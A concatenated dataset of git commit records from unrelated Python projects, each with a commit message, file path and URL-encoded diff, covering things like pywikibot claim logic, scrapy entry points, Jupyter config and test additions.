+%0A%0Aimport saga.exceptions as se%0A%0A# ----------------------------------------------------------------%0A#%0Adef translate_exception (e, msg=None) :%0A %22%22%22%0A In many cases, we should be able to roughly infer the exception cause%0A from the error message -- this is centrally done in this method. If%0A possible, it will return a new exception with a more concise error%0A message and appropriate exception type.%0A %22%22%22%0A%0A if not issubclass (e.__class__, se.SagaException) :%0A # we do not touch non-saga exceptions%0A return e%0A%0A if not issubclass (e.__class__, se.NoSuccess) :%0A # this seems to have a specific cause already, leave it alone%0A return e%0A%0A cmsg = e._plain_message%0A%0A if msg :%0A cmsg = %22%25s (%25s)%22 %25 (cmsg, msg)%0A%0A lmsg = cmsg.lower ()%0A%0A if 'could not resolve hostname' in lmsg :%0A e = se.BadParameter (cmsg)%0A%0A elif 'connection timed out' in lmsg :%0A e = se.BadParameter (cmsg)%0A%0A elif 'auth' in lmsg :%0A e = se.AuthorizationFailed (cmsg)%0A%0A elif 'pass' in lmsg :%0A e = se.AuthenticationFailed (cmsg)%0A%0A elif 'ssh_exchange_identification' in lmsg :%0A e = se.AuthenticationFailed (%22too frequent login attempts, or sshd misconfiguration: %25s%22 %25 cmsg)%0A%0A elif 'denied' in lmsg :%0A e = se.PermissionDenied (cmsg)%0A%0A elif 'shared connection' in lmsg :%0A e = se.NoSuccess (%22Insufficient system resources: %25s%22 %25 cmsg)%0A%0A elif 'pty allocation' in lmsg :%0A e = se.NoSuccess (%22Insufficient system resources: %25s%22 %25 cmsg)%0A%0A elif 'Connection to master closed' in lmsg :%0A e = se.NoSuccess (%22Connection failed (insufficient system resources?): %25s%22 %25 cmsg)%0A%0A return e%0A%0A
|
|
df7a5c4aa4f5898de3c70cef17c3c5031f7e05a6
|
Add support for executing scrapy using -m option of python
|
scrapy/__main__.py
|
scrapy/__main__.py
|
Python
| 0.000007
|
@@ -0,0 +1,77 @@
+from scrapy.cmdline import execute%0A%0Aif __name__ == '__main__':%0A execute()%0A
|
|
3c9d90f2f3177c611b848b136f8bfe9f4a676dd5
|
Fix logic in claimit.py
|
scripts/claimit.py
|
scripts/claimit.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
A script that adds claims to Wikidata items based on a list of pages.
------------------------------------------------------------------------------
Usage:
python pwb.py claimit [pagegenerators] P1 Q2 P123 Q456
You can use any typical pagegenerator (like categories) to provide with a
list of pages. Then list the property-->target pairs to add.
------------------------------------------------------------------------------
For geographic coordinates:
python pwb.py claimit [pagegenerators] P625 [lat-dec],[long-dec],[prec]
[lat-dec] and [long-dec] represent the latitude and longitude respectively,
and [prec] represents the precision. All values are in decimal degrees,
not DMS. If [prec] is omitted, the default precision is 0.0001 degrees.
Example:
python pwb.py claimit [pagegenerators] P625 -23.3991,-52.0910,0.0001
------------------------------------------------------------------------------
By default, claimit.py does not add a claim if one with the same property
already exists on the page. To override this behavior, use the 'exists' option:
python pwb.py claimit [pagegenerators] P246 "string example" -exists:p
Suppose the claim you want to add has the same property as an existing claim
and the "-exists:p" argument is used. Now, claimit.py will not add the claim
if it has the same target, source, and/or the existing claim has qualifiers.
To override this behavior, add 't' (target), 's' (sources), or 'q' (qualifiers)
to the 'exists' argument.
For instance, to add the claim to each page even if one with the same
property and target and some qualifiers already exists:
python pwb.py claimit [pagegenerators] P246 "string example" -exists:ptq
Note that the ordering of the letters in the 'exists' argument does not matter,
but 'p' must be included.
"""
#
# (C) Legoktm, 2013
# (C) Pywikibot team, 2013-2017
#
# Distributed under the terms of the MIT license.
#
from __future__ import absolute_import, unicode_literals
import pywikibot
from pywikibot import pagegenerators, WikidataBot
# This is required for the text that is shown when you run this script
# with the parameter -help or without parameters.
docuReplacements = {
'¶ms;': pagegenerators.parameterHelp,
}
class ClaimRobot(WikidataBot):
"""A bot to add Wikidata claims."""
def __init__(self, generator, claims, exists_arg=''):
"""
Constructor.
@param generator: A generator that yields Page objects.
@type generator: iterator
@param claims: A list of wikidata claims
@type claims: list
@param exists_arg: String specifying how to handle duplicate claims
@type exists_arg: str
"""
self.availableOptions['always'] = True
super(ClaimRobot, self).__init__(use_from_page=None)
self.generator = generator
self.claims = claims
self.exists_arg = ''.join(x for x in exists_arg.lower() if x in 'pqst')
self.cacheSources()
if self.exists_arg:
pywikibot.output("'exists' argument set to '%s'" % self.exists_arg)
def treat(self, page, item):
"""Treat each page."""
self.current_page = page
# The generator might yield pages from multiple sites
source = self.getSource(page.site)
for claim in self.claims:
# Existing claims on page of same property
for existing in item.claims.get(claim.getID(), []):
# If claim with same property already exists...
if 'p' not in self.exists_arg:
pywikibot.log(
'Skipping %s because claim with same property already exists'
% (claim.getID(),))
pywikibot.log(
'Use -exists:p option to override this behavior')
break
# If some attribute of the claim being added
# matches some attribute in an existing claim of
# the same property, skip the claim, unless the
# 'exists' argument overrides it.
if (existing.target_equals(claim.getTarget()) and
't' not in self.exists_arg):
pywikibot.log(
'Skipping %s because claim with same target already exists'
% (claim.getID(),))
pywikibot.log(
"Append 't' to -exists argument to override this behavior")
break
if 'q' not in self.exists_arg and not existing.qualifiers:
pywikibot.log(
'Skipping %s because claim without qualifiers already exists'
% (claim.getID(),))
pywikibot.log(
"Append 'q' to -exists argument to override this behavior")
break
if ('s' not in self.exists_arg or not source) and not existing.sources:
pywikibot.log(
'Skipping %s because claim without source already exists'
% (claim.getID(),))
pywikibot.log(
"Append 's' to -exists argument to override this behavior")
break
if ('s' not in self.exists_arg and source and
any(source.getID() in ref and
all(snak.target_equals(source.getTarget())
for snak in ref[source.getID()])
for ref in existing.sources)):
pywikibot.log(
'Skipping %s because claim with the same source already exists'
% (claim.getID(),))
pywikibot.log(
"Append 's' to -exists argument to override this behavior")
break
else:
self.user_add_claim(item, claim, page.site)
def main(*args):
"""
Process command line arguments and invoke bot.
If args is an empty list, sys.argv is used.
@param args: command line arguments
@type args: list of unicode
@rtype: bool
"""
exists_arg = ''
commandline_claims = []
# Process global args and prepare generator args parser
local_args = pywikibot.handle_args(args)
gen = pagegenerators.GeneratorFactory()
for arg in local_args:
# Handle args specifying how to handle duplicate claims
if arg.startswith('-exists:'):
exists_arg = arg.split(':')[1]
continue
# Handle page generator args
if gen.handleArg(arg):
continue
commandline_claims.append(arg)
if len(commandline_claims) % 2:
pywikibot.error('Incomplete command line property-value pair.')
return False
claims = []
repo = pywikibot.Site().data_repository()
for i in range(0, len(commandline_claims), 2):
claim = pywikibot.Claim(repo, commandline_claims[i])
if claim.type == 'wikibase-item':
target = pywikibot.ItemPage(repo, commandline_claims[i + 1])
elif claim.type == 'string':
target = commandline_claims[i + 1]
elif claim.type == 'globe-coordinate':
coord_args = [float(c) for c in commandline_claims[i + 1].split(',')]
if len(coord_args) >= 3:
precision = coord_args[2]
else:
precision = 0.0001 # Default value (~10 m at equator)
target = pywikibot.Coordinate(coord_args[0], coord_args[1], precision=precision)
else:
raise NotImplementedError(
"%s datatype is not yet supported by claimit.py"
% claim.type)
claim.setTarget(target)
claims.append(claim)
generator = gen.getCombinedGenerator()
if not generator:
pywikibot.bot.suggest_help(missing_generator=True)
return False
bot = ClaimRobot(generator, claims, exists_arg)
bot.run()
return True
if __name__ == "__main__":
main()
|
Python
| 0
|
@@ -3881,32 +3881,127 @@
break%0A
+ if not existing.target_equals(claim.getTarget()):%0A continue%0A
@@ -4247,79 +4247,8 @@
if
-(existing.target_equals(claim.getTarget()) and%0A
't'
@@ -4269,17 +4269,16 @@
ists_arg
-)
:%0A
|
d94123ba898032e7837aa8a2fd0fe585ed81e2d5
|
Add back a filesystem backend for testing and development
|
scrapi/processing/storage.py
|
scrapi/processing/storage.py
|
Python
| 0
|
@@ -0,0 +1,839 @@
+import os%0Aimport json%0A%0Afrom scrapi.processing.base import BaseProcessor%0A%0A%0Aclass StorageProcessor(BaseProcessor):%0A NAME = 'storage'%0A%0A def process_raw(self, raw):%0A filename = 'archive/%7B%7D/%7B%7D/raw.%7B%7D'.format(raw%5B'source'%5D, raw%5B'docID'%5D, raw%5B'filetype'%5D)%0A if not os.path.exists(os.path.dirname(filename)):%0A os.makedirs(os.path.dirname(filename))%0A%0A with open(filename, 'w') as f:%0A f.write(json.dumps(raw.attributes, indent=4))%0A%0A def process_normalized(self, raw, normalized):%0A filename = 'archive/%7B%7D/%7B%7D/normalized.json'.format(raw%5B'source'%5D, raw%5B'docID'%5D, raw%5B'filetype'%5D)%0A if not os.path.exists(os.path.dirname(filename)):%0A os.makedirs(os.path.dirname(filename))%0A%0A with open(filename, 'w') as f:%0A f.write(json.dumps(normalized.attributes, indent=4))%0A
|
|
e6699947ebde4d51b1bd8b6016879d4917d7a648
|
implement initial base exception class and httperror exception class
|
scup/exceptions.py
|
scup/exceptions.py
|
Python
| 0
|
@@ -0,0 +1,493 @@
+class ScupPythonError(Exception):%0A%09%22%22%22 Base class for exceptions raised by scup-python. %22%22%22%0A%0A%0Aclass ScupError(ScupPythonError):%0A%09%22%22%22 Exception for Scup errors. %22%22%22%0A%09def __init__(self, message=None, code=None, error_data=None):%0A%09%09self.message = message%0A%09%09self.code = code%0A%09%09self.error_data = error_data%0A%0A%09%09if self.code:%0A%09%09%09message = '%5B%7B%7D%5D %7B%7D'.format(self.code, self.message)%0A%0A%09%09super(ScupError, self).__init__(message)%0A%0Aclass HTTPError(ScupPythonError):%0A%09%22%22%22 Exception for transport errors. %22%22%22
|
|
ded34849d9eb2feb51b9ad7f31e210db3a28c7e1
|
change case
|
aleph/assets.py
|
aleph/assets.py
|
import os
from flask.ext.assets import Bundle
from aleph.core import assets, app
deps_assets = Bundle(
'vendor/jquery/dist/jquery.js',
'vendor/angular/angular.js',
'vendor/ng-debounce/angular-debounce.js',
'vendor/angular-route/angular-route.js',
'vendor/angular-animate/angular-animate.js',
'vendor/angular-loading-bar/build/loading-bar.js',
'vendor/angular-truncate/src/truncate.js',
'vendor/angular-bootstrap/ui-bootstrap-tpls.js',
'vendor/nginfinitescroll/build/ng-infinite-scroll.js',
filters='uglifyjs',
output='assets/deps.js'
)
js_files = []
for (root, dirs, files) in os.walk(os.path.join(app.static_folder, 'js')):
for file_name in files:
file_path = os.path.relpath(os.path.join(root, file_name),
app.static_folder)
js_files.append(file_path)
app_assets = Bundle(*js_files,
filters='uglifyjs',
output='assets/app.js')
css_assets = Bundle(
'style/aleph.scss',
'vendor/angular-loading-bar/build/loading-bar.css',
'style/animations.css',
filters='scss',
output='assets/style.css'
)
assets.register('deps', deps_assets)
assets.register('app', app_assets)
assets.register('css', css_assets)
|
Python
| 0.00005
|
@@ -480,17 +480,17 @@
r/ng
-i
+I
nfinite
-s
+S
crol
|
b2d60408688cc1bf27842d8744d1048a64b00e94
|
Add script to get public registrations for staff members
|
scripts/staff_public_regs.py
|
scripts/staff_public_regs.py
|
Python
| 0
|
@@ -0,0 +1,1366 @@
+# -*- coding: utf-8 -*-%0A%22%22%22Get public registrations for staff members.%0A%0A python -m scripts.staff_public_regs%0A%22%22%22%0Afrom collections import defaultdict%0Aimport logging%0A%0Afrom modularodm import Q%0A%0Afrom website.models import Node, User%0Afrom website.app import init_app%0A%0Alogger = logging.getLogger('staff_public_regs')%0A%0ASTAFF_GUIDS = %5B%0A 'jk5cv', # Jeff%0A 'cdi38', # Brian%0A 'edb8y', # Johanna%0A 'hsey5', # Courtney%0A '5hdme', # Melissa%0A%5D%0A%0Adef main():%0A init_app(set_backends=True, routes=False, mfr=False)%0A staff_registrations = defaultdict(list)%0A users = %5BUser.load(each) for each in STAFF_GUIDS%5D%0A for registration in Node.find(Q('is_registration', 'eq', True) & Q('is_public', 'eq', True)):%0A for user in users:%0A if registration in user.node__contributed:%0A staff_registrations%5Buser._id%5D.append(registration)%0A%0A for uid in staff_registrations:%0A user = User.load(uid)%0A user_regs = staff_registrations%5Buid%5D%0A logger.info('%7B%7D (%7B%7D) on %7B%7D Public Registrations:'.format(%0A user.fullname,%0A user._id,%0A len(user_regs))%0A )%0A for registration in user_regs:%0A logger.info('%5Ct%7B%7D (%7B%7D): %7B%7D'.format(registration.title,%0A registration._id,%0A registration.absolute_url)%0A )%0A%0Aif __name__ == '__main__':%0A main()%0A
|
|
b77f90c4372161243fcabb3eddbe4d35b4792bfc
|
Create jupyter_notebook_config.py
|
jupyter_notebook_config.py
|
jupyter_notebook_config.py
|
Python
| 0.000002
|
@@ -0,0 +1,1045 @@
+# Copyright 2015 The TensorFlow Authors. All Rights Reserved.%0A#%0A# Licensed under the Apache License, Version 2.0 (the %22License%22);%0A# you may not use this file except in compliance with the License.%0A# You may obtain a copy of the License at%0A#%0A# http://www.apache.org/licenses/LICENSE-2.0%0A#%0A# Unless required by applicable law or agreed to in writing, software%0A# distributed under the License is distributed on an %22AS IS%22 BASIS,%0A# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.%0A# See the License for the specific language governing permissions and%0A# limitations under the License.%0A# ==============================================================================%0Aimport os%0Afrom IPython.lib import passwd%0A%0Ac.NotebookApp.ip = '*'%0Ac.NotebookApp.port = 8888%0Ac.NotebookApp.open_browser = False%0Ac.MultiKernelManager.default_kernel_name = 'python2'%0A%0A# sets a password if PASSWORD is set in the environment%0Aif 'PASSWORD' in os.environ:%0A c.NotebookApp.password = passwd(os.environ%5B'PASSWORD'%5D)%0A del os.environ%5B'PASSWORD'%5D%0A
|
|
d4a8c33d50a7c130d6203ef6332a241392516ba2
|
Create database.py
|
database.py
|
database.py
|
Python
| 0.000001
|
@@ -0,0 +1,807 @@
+#!/usr/bin/python%0Aimport MySQLdb%0A%0Adef getemail():%0A alist=%5B%5D%0A # Open database connection Replace username, password with your username password and dbname with the name of database%0A db = MySQLdb.connect(%22localhost%22,%22username%22,%22password%22,%22dbname%22 )%0A # prepare a cursor object using cursor() method%0A cursor = db.cursor()%0A #replace emails with your table name containing a column 'email' holding the email addresses%0A sql = %22SELECT * FROM emails%22%0A try:%0A # Execute the SQL command%0A cursor.execute(sql)%0A # Fetch all the rows in a list of lists.%0A results = cursor.fetchall()%0A for row in results:%0A alist.append(row%5B'email'%5D)%0A %0A except:%0A print %22Error: unable to fecth data%22%0A %0A%0A # disconnect from server%0A db.close()%0A return alist%0A
|
|
5bb77cb83ea443e5e3ae4b4000763e4289f8e87a
|
add timeout and retry for ssh
|
smoketests/base.py
|
smoketests/base.py
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import boto
import commands
import httplib
import os
import paramiko
import sys
import time
import unittest
from boto.ec2.regioninfo import RegionInfo
from smoketests import flags
SUITE_NAMES = '[image, instance, volume]'
FLAGS = flags.FLAGS
flags.DEFINE_string('suite', None, 'Specific test suite to run ' + SUITE_NAMES)
boto_v6 = None
class SmokeTestCase(unittest.TestCase):
def connect_ssh(self, ip, key_name):
# TODO(devcamcar): set a more reasonable connection timeout time
key = paramiko.RSAKey.from_private_key_file('/tmp/%s.pem' % key_name)
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.WarningPolicy())
client.connect(ip, username='root', pkey=key)
return client
def can_ping(self, ip, command="ping"):
"""Attempt to ping the specified IP, and give up after 1 second."""
# NOTE(devcamcar): ping timeout flag is different in OSX.
if sys.platform == 'darwin':
timeout_flag = 't'
else:
timeout_flag = 'w'
status, output = commands.getstatusoutput('%s -c1 -%s1 %s' %
(command, timeout_flag, ip))
return status == 0
def wait_for_running(self, instance, tries=60, wait=1):
"""Wait for instance to be running"""
for x in xrange(tries):
instance.update()
if instance.state.startswith('running'):
return True
time.sleep(wait)
else:
return False
def wait_for_ping(self, ip, command="ping", tries=120):
"""Wait for ip to be pingable"""
for x in xrange(tries):
if self.can_ping(ip, command):
return True
else:
return False
def wait_for_ssh(self, ip, key_name, tries=30, wait=5):
"""Wait for ip to be sshable"""
for x in xrange(tries):
try:
conn = self.connect_ssh(ip, key_name)
conn.close()
except Exception, e:
time.sleep(wait)
else:
return True
else:
return False
def connection_for_env(self, **kwargs):
"""
Returns a boto ec2 connection for the current environment.
"""
access_key = os.getenv('EC2_ACCESS_KEY')
secret_key = os.getenv('EC2_SECRET_KEY')
clc_url = os.getenv('EC2_URL')
if not access_key or not secret_key or not clc_url:
raise Exception('Missing EC2 environment variables. Please source '
'the appropriate novarc file before running this '
'test.')
parts = self.split_clc_url(clc_url)
if FLAGS.use_ipv6:
return boto_v6.connect_ec2(aws_access_key_id=access_key,
aws_secret_access_key=secret_key,
is_secure=parts['is_secure'],
region=RegionInfo(None,
'nova',
parts['ip']),
port=parts['port'],
path='/services/Cloud',
**kwargs)
return boto.connect_ec2(aws_access_key_id=access_key,
aws_secret_access_key=secret_key,
is_secure=parts['is_secure'],
region=RegionInfo(None,
'nova',
parts['ip']),
port=parts['port'],
path='/services/Cloud',
**kwargs)
def split_clc_url(self, clc_url):
"""
Splits a cloud controller endpoint url.
"""
parts = httplib.urlsplit(clc_url)
is_secure = parts.scheme == 'https'
ip, port = parts.netloc.split(':')
return {'ip': ip, 'port': int(port), 'is_secure': is_secure}
def create_key_pair(self, conn, key_name):
try:
os.remove('/tmp/%s.pem' % key_name)
except:
pass
key = conn.create_key_pair(key_name)
key.save('/tmp/')
return key
def delete_key_pair(self, conn, key_name):
conn.delete_key_pair(key_name)
try:
os.remove('/tmp/%s.pem' % key_name)
except:
pass
def bundle_image(self, image, tempdir='/tmp', kernel=False):
cmd = 'euca-bundle-image -i %s -d %s' % (image, tempdir)
if kernel:
cmd += ' --kernel true'
status, output = commands.getstatusoutput(cmd)
if status != 0:
print '%s -> \n %s' % (cmd, output)
raise Exception(output)
return True
def upload_image(self, bucket_name, image, tempdir='/tmp'):
cmd = 'euca-upload-bundle -b '
cmd += '%s -m %s/%s.manifest.xml' % (bucket_name, tempdir, image)
status, output = commands.getstatusoutput(cmd)
if status != 0:
print '%s -> \n %s' % (cmd, output)
raise Exception(output)
return True
def delete_bundle_bucket(self, bucket_name):
cmd = 'euca-delete-bundle --clear -b %s' % (bucket_name)
status, output = commands.getstatusoutput(cmd)
if status != 0:
print '%s -> \n%s' % (cmd, output)
raise Exception(output)
return True
TEST_DATA = {}
class UserSmokeTestCase(SmokeTestCase):
def setUp(self):
global TEST_DATA
self.conn = self.connection_for_env()
self.data = TEST_DATA
|
Python
| 0
|
@@ -1094,16 +1094,82 @@
_NAMES)%0A
+flags.DEFINE_integer('ssh_tries', 3, 'Numer of times to try ssh')%0A
boto_v6
@@ -1262,81 +1262,8 @@
e):%0A
- # TODO(devcamcar): set a more reasonable connection timeout time%0A
@@ -1328,32 +1328,96 @@
em' %25 key_name)%0A
+ tries = 0%0A while(True):%0A try:%0A
client =
@@ -1442,24 +1442,32 @@
t()%0A
+
+
client.set_m
@@ -1515,16 +1515,24 @@
licy())%0A
+
@@ -1579,31 +1579,226 @@
=key
-)%0A return client
+, timeout=5)%0A return client%0A except (paramiko.AuthenticationException, paramiko.SSHException):%0A tries += 1%0A if tries == FLAGS.ssh_tries:%0A raise
%0A%0A
|
cb73106d4a47a21f82021794234672600cceb2c6
|
Add fix_genre_counts
|
populate_database/fix_genre_counts.py
|
populate_database/fix_genre_counts.py
|
Python
| 0.000018
|
@@ -0,0 +1,924 @@
+#!/usr/bin/python%0A%0A# we've been outputting stuff to text so now I get to wedge it into a database%0A# funtimes%0A%0A# set up the database with %60sqlite3 netflix_genres.sqlite %3C create_tables.sql%60%0A%0Aimport codecs%0Aimport sqlite3%0Aimport sys%0A%0Aconn = sqlite3.connect('netflix.sqlite')%0Ac = conn.cursor()%0A%0Ac.execute('SELECT genre_id, name, movie_count FROM genres WHERE name != %22%22 ORDER BY name')%0Agenres = c.fetchall()%0A%0Aupdates = %5B%5D%0A%0Afor genre in genres:%0A (genre_id, name, movie_count) = genre%0A%0A genre_str = '%25'+'%2505i'%25 genre_id+'%25'%0A c.execute(%22SELECT COUNT(1) FROM movies WHERE genres LIKE ?%22, (genre_str,))%0A result = c.fetchone()%5B0%5D%0A%0A if result %3E movie_count or movie_count == '':%0A updates.append((result, genre_id))%0A # print genre_id, result, movie_count, name%0A%0Aprint updates%0A%0Aprint %22... Inserting%22%0A%0Ac.executemany('UPDATE genres SET movie_count = ? WHERE genre_id = ?', updates)%0A%0Aconn.commit()%0Aconn.close()%0A
|
|
d74f0d174f509b0a65e5643356af8eff1f5a4ca8
|
Add a snippet.
|
python/scipy/write_stereo_wav_file.py
|
python/scipy/write_stereo_wav_file.py
|
Python
| 0.000002
|
@@ -0,0 +1,716 @@
+#!/usr/bin/env python3%0A# -*- coding: utf-8 -*-%0A%0A# Read the content of an audio wave file (.wav)%0A# See: http://docs.scipy.org/doc/scipy-0.14.0/reference/generated/scipy.io.wavfile.write.html%0A%0Aimport numpy as np%0Afrom scipy.io import wavfile%0A%0Adef sin_wave(freq1, freq2, num_frames, rate):%0A data_list_1 = %5Bint(127 * (np.sin(t/float(rate) * freq1 * 2. * np.pi) + 1)) for t in range(num_frames)%5D%0A data_list_2 = %5Bint(127 * (np.sin(t/float(rate) * freq2 * 2. * np.pi) + 1)) for t in range(num_frames)%5D%0A data_list = %5Bdata_list_1, data_list_2%5D%0A return np.array(data_list, dtype=np.int8).T%0A%0Arate = 24000%0Anum_frames = 48000%0A%0Anparray = sin_wave(440, 880, num_frames, rate)%0A%0Awavfile.write(%22./test.wav%22, rate, nparray)%0A
|
|
181832a67d3fa3a4993d495dc9db12fdae7329f7
|
add context processor tests
|
clastic/tests/test_context_proc.py
|
clastic/tests/test_context_proc.py
|
Python
| 0.000001
|
@@ -0,0 +1,2865 @@
+from __future__ import unicode_literals%0Afrom nose.tools import eq_, raises%0A%0Aimport json%0A%0Afrom werkzeug.test import Client%0Afrom werkzeug.wrappers import BaseResponse%0A%0Afrom clastic import Application, json_response%0Afrom clastic.middleware import SimpleContextProcessor, ContextProcessor%0Afrom common import hello_world, hello_world_ctx, RequestProvidesName%0A%0A%0Adef test_simple_ctx_proc():%0A add_name_lang = SimpleContextProcessor(name='Kurt', language='en')%0A app = Application(%5B('/', hello_world_ctx, json_response)%5D,%0A middlewares=%5Badd_name_lang%5D)%0A c = Client(app, BaseResponse)%0A resp = c.get('/')%0A resp_data = json.loads(resp.data)%0A yield eq_, resp_data%5B'name'%5D, 'world' # does not overwrite%0A yield eq_, resp_data%5B'language'%5D, 'en'%0A%0A%0Adef test_ctx_proc_req():%0A req_provides_name = RequestProvidesName()%0A add_name_lang = ContextProcessor(%5B'name'%5D, %7B'language': 'en'%7D)%0A app = Application(%5B('/', hello_world_ctx, json_response)%5D,%0A middlewares=%5Breq_provides_name, add_name_lang%5D)%0A c = Client(app, BaseResponse)%0A resp = c.get('/')%0A resp_data = json.loads(resp.data)%0A yield eq_, resp_data%5B'name'%5D, 'world' # does not overwrite%0A yield eq_, resp_data%5B'language'%5D, 'en'%0A%0A resp = c.get('/?name=Alex')%0A resp_data = json.loads(resp.data)%0A yield eq_, resp_data%5B'name'%5D, 'Alex' # still does not overwrite%0A%0A%0Adef test_ctx_proc_overwrite():%0A add_name = ContextProcessor(defaults=%7B'name': 'Kurt'%7D, overwrite=True)%0A app = Application(%5B('/', hello_world_ctx, json_response)%5D,%0A middlewares=%5Badd_name%5D)%0A c = Client(app, BaseResponse)%0A resp = c.get('/')%0A resp_data = json.loads(resp.data)%0A yield eq_, resp_data%5B'name'%5D, 'Kurt' # does overwrite%0A%0A%0Adef test_ctx_proc_empty():%0A add_name = ContextProcessor()%0A app = Application(%5B('/', hello_world_ctx, json_response)%5D,%0A middlewares=%5Badd_name%5D)%0A c = Client(app, BaseResponse)%0A resp = c.get('/')%0A resp_data = json.loads(resp.data)%0A yield eq_, resp_data%5B'name'%5D, 'world' # does overwrite%0A%0A%0Adef test_ctx_proc_nonctx():%0A add_name = ContextProcessor(defaults=%7B'name': 'Kurt'%7D)%0A app = Application(%5B('/', hello_world)%5D,%0A middlewares=%5Badd_name%5D)%0A c = Client(app, BaseResponse)%0A resp = c.get('/')%0A yield eq_, resp.data, 'Hello, world!'%0A%0A%0A@raises(NameError)%0Adef test_ctx_proc_overlap():%0A ContextProcessor(required=%5B'name'%5D,%0A defaults=%7B'name': 'Alex'%7D)%0A%0A%0A@raises(NameError)%0Adef test_ctx_proc_reserved():%0A ContextProcessor(required=%5B'next'%5D)%0A%0A%0A@raises(TypeError)%0Adef test_ctx_proc_req_type():%0A ContextProcessor(required=%5B6%5D)%0A%0A%0A@raises(TypeError)%0Adef test_ctx_proc_default_type():%0A ContextProcessor(default=%7B6: ''%7D)%0A%0A%0A@raises(TypeError)%0Adef test_ctx_proc_def_nonmap():%0A ContextProcessor(defaults=%5B'hi', 'hello'%5D)%0A
|
|
f9bdf777a13404ba25e0e8cdf99a3554320529c9
|
Add warnings to inspector DOM count unittest baselines.
|
tools/telemetry/telemetry/core/backends/chrome/inspector_memory_unittest.py
|
tools/telemetry/telemetry/core/backends/chrome/inspector_memory_unittest.py
|
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from telemetry import benchmark
from telemetry.unittest import tab_test_case
class InspectorMemoryTest(tab_test_case.TabTestCase):
@benchmark.Enabled('has tabs')
def testGetDOMStats(self):
# Due to an issue with CrOS, we create a new tab here rather than
# using the existing tab to get a consistent starting page on all platforms.
self._tab = self._browser.tabs.New()
self.Navigate('dom_counter_sample.html')
counts = self._tab.dom_stats
self.assertEqual(counts['document_count'], 1)
self.assertEqual(counts['node_count'], 14)
self.assertEqual(counts['event_listener_count'], 2)
|
Python
| 0.000003
|
@@ -599,85 +599,439 @@
-counts = self._tab.dom_stats%0A self.assertEqual(counts%5B'document_count'%5D, 1
+# Document_count %3E 1 indicates that WebCore::Document loaded in Chrome%0A # is leaking! The baseline should exactly match the numbers on:%0A # unittest_data/dom_counter_sample.html%0A # Please contact kouhei@, hajimehoshi@ when rebaselining.%0A counts = self._tab.dom_stats%0A self.assertEqual(counts%5B'document_count'%5D, 1,%0A 'Document leak is detected! '+%0A 'The previous document is likely retained unexpectedly.'
)%0A
@@ -1073,16 +1073,50 @@
nt'%5D, 14
+,%0A 'Node leak is detected!'
)%0A se
@@ -1163,10 +1163,53 @@
unt'%5D, 2
+,%0A 'EventListener leak is detected!'
)%0A
|
3119222d27bd63b9f4e9a57ff8e9d88e53d9735a
|
Modify island.py
|
island.py
|
island.py
|
Python
| 0.000007
|
@@ -0,0 +1,271 @@
+from noise import generate_noise%0Afrom PIL import Image%0Aimport numpy as np%0A%0AWIDTH = 128%0AHEIGHT = 128%0A%0Aif __name__ == '__main__':%0A data = np.array(generate_noise(WIDTH, HEIGHT, triple=True), dtype=np.uint8)%0A img = Image.fromarray(data, 'RGB')%0A img.save('out.png')%0A
|
|
2d55503216d7020a71017fbcb2c1b48661c345cb
|
Add manage
|
manage.py
|
manage.py
|
Python
| 0.000001
|
@@ -0,0 +1,249 @@
+#!/usr/bin/env python%0Aimport os%0Aimport sys%0A%0Aif __name__ == %22__main__%22:%0A os.environ.setdefault(%22DJANGO_SETTINGS_MODULE%22, %22mysite.settings%22)%0A%0A from django.core.management import execute_from_command_line%0A%0A execute_from_command_line(sys.argv)%0A
|
|
77738a8b7e895b5f71418d5417db04f34b08f918
|
add manage.py
|
manage.py
|
manage.py
|
Python
| 0.000001
|
@@ -0,0 +1,242 @@
+#!/usr/bin/env python%0Aimport os%0Aimport sys%0A%0Aif __name__ == %22__main__%22:%0A os.environ.setdefault(%22DJANGO_SETTINGS_MODULE%22, %22settings%22)%0A%0A from django.core.management import execute_from_command_line%0A%0A execute_from_command_line(sys.argv)%0A
|
|
10ef7955b21e3f9d3f3ac9eb43995e7cf0e91201
|
Add meta/import_all.py for testing
|
meta/import_all.py
|
meta/import_all.py
|
Python
| 0
|
@@ -0,0 +1,1370 @@
+#! /usr/bin/env python%0A# encoding: utf-8%0A%22%22%22Imports all the modules under the specified path.%0A%0AThis can be useful as a basic static analysis test, assuming that the imports%0Ado not have side-effects.%0A%0A%22%22%22%0A%0Afrom __future__ import print_function%0A%0Aimport argparse%0Aimport importlib%0Aimport os%0Aimport sys%0A%0A%0Adef main():%0A parser = argparse.ArgumentParser(description=__doc__)%0A parser.add_argument(%0A %22PATH%22,%0A help=%22path to the package to import from%22)%0A parser.add_argument(%0A %22--verbose%22,%0A %22-v%22,%0A action=%22store_true%22)%0A args = parser.parse_args()%0A%0A parent_dir, package = os.path.split(args.PATH)%0A%0A # Python looks in sys.path to find modules to import, if we don't do this%0A # then it probably won't find any of the modules under parent_dir.%0A sys.path.append(os.path.abspath(parent_dir))%0A%0A os.chdir(parent_dir)%0A%0A for root, _, files in os.walk(package):%0A for f in files:%0A if not f.endswith('.py'):%0A continue%0A module_name = f%5B:-3%5D%0A module_list = root.split('/')%0A%0A if not module_name == '__init__':%0A module_list.append(module_name)%0A%0A module_ref = '.'.join(module_list)%0A if args.verbose:%0A print(module_ref)%0A importlib.import_module(module_ref)%0A%0A%0Aif __name__ == %22__main__%22:%0A sys.exit(main())%0A
|
|
efd125ef973a680b6413e820e1308070a79554b4
|
Encrypt with vigenere cipher
|
practic_stage/hmw8/main.py
|
practic_stage/hmw8/main.py
|
Python
| 0.007626
|
@@ -0,0 +1,462 @@
